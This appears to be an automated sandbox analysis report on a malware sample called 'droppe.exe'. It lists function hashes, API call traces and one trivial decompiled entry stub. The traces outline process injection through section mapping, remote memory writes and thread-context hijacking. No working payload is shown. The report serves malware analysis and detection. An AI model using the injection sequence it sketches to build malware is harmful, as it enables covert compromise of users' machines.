Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: sort.exe Analysis ID: 67025

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:A8B931811E8A8BDB83E0AFF2E1C6E560
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:67025
Initial sample SHA 256:05F1BC8B6F82269B0EB8BF91AE796EC45FA481C27934244A4C7177CDF1E6123E
Initial sample name:droppe.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
